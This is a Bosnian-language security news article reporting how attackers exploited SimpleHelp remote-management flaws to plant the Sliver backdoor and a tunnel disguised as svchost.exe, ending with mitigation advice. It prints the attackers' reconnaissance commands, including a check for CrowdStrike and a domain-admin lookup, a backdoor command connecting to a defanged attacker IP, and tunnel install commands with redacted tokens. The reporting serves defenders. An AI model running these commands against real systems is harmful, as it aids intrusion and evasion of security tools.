Hakeri iskorištavaju propuste SimpleHelp-a za postavljanje malicioznog softvera na sisteme

Đorđe

1 month ago

Hakeri iskorištavaju propuste SimpleHelp-a za postavljanje malicioznog softvera na sisteme-Kiber.ba

Hakeri su iskorištavali ranjivosti SimpleHelp alata za daljinsko upravljanje i nadgledanje (RMM) za postavljanje malicioznog softvera, uključujući Sliver backdoor, na narušene sisteme.

Ovaj napad naglašava važnost održavanja softvera ažurnim i implementacije robusnih sigurnosnih mjera za sprječavanje takvih eksploatacija.

Napad počinje tako što se haker povezuje na krajnju tačku preko ranjivog SimpleHelp RMM klijenta, poznatog kao JWrapper-Remote Access.

U jednom slučaju, veza je napravljena sa IP adrese 194.76.227[.]171 , koja se nalazi u Estoniji i hostuje SimpleHelp Server na portu 80.

Podaci povezani sa IP 194.76.227[.]171 (izvor – efekat polja)

Istraživači iz kompanije Field Effect otkrili su da nakon što se poveže, haker izvršava niz naredbi za otkrivanje kako bi prikupio detalje o sistemu, korisničke naloge i informacije o mreži.

Ove naredbe uključuju:-

ipconfig /all
sc query
schtasks
driverquery
nltest /dclist:
nltest /domain_trusts
net share
net use
tasklist
findstr CSFalcon
quser
net group "domain admins" /domain
hostname
ping <DC_Hostname>

Napadači koriste Sliver backdoor, alat za post-eksploataciju napisan u Go-u, koji pruža mogućnosti za ubacivanje procesa, manipulisanje usluga, izvršavanje naredbi i manipulaciju sistemom datoteka. Backdoor je konfigurisan da se poveže na IP adresu 45.9.148[.]136 na portu 443 koristeći naredbu:

agent.exe -connect 45.9.148[.]136:443 -ignore-cert

Podaci povezani sa IP 45.9.148[.]136 (izvor – efekat polja)

Bočno kretanje i dodatna korisna opterećenja

Osim postavljanja Sliver backdoor-a, napadači su također instalirali tunel koji je raspršen cloud-om, maskirajući ga kao legitimni Windows svchost.exe, kako bi uspostavili sigurnu, šifrovanu vezu za dalje maliciozne aktivnosti. Ovo je urađeno pomoću naredbe:

c:\Windows\svchost.exe svchost.exe service install (redacted Base64 encoded token)

slijedi:

c:\Windows\svchost.exe tunnel run --token (redacted Base64 encoded token)

Podaci povezani sa IP 45.9.149[.]112 (Izvor – efekat polja)

Organizacije koje koriste SimpleHelp RMM mogu se zaštititi od ovih napada tako što će SimpleHelp i sve alate za daljinski pristup ažurirati.

Ne samo da čak i jedan može ograničiti udaljeni pristup pouzdanim IP rasponima s višefaktorskom autentifikacijom, nadgledati mrežni promet i zapisnike za maliciozne veze i redovno pregledavati administrativne račune za neovlaštene dodatke.

Poduzimanjem ovih koraka, organizacije mogu značajno smanjiti svoju ranjivost na takve napade i zaštititi svoje sisteme od maliciozne eksploatacije.

Izvor: CyberSecurityNews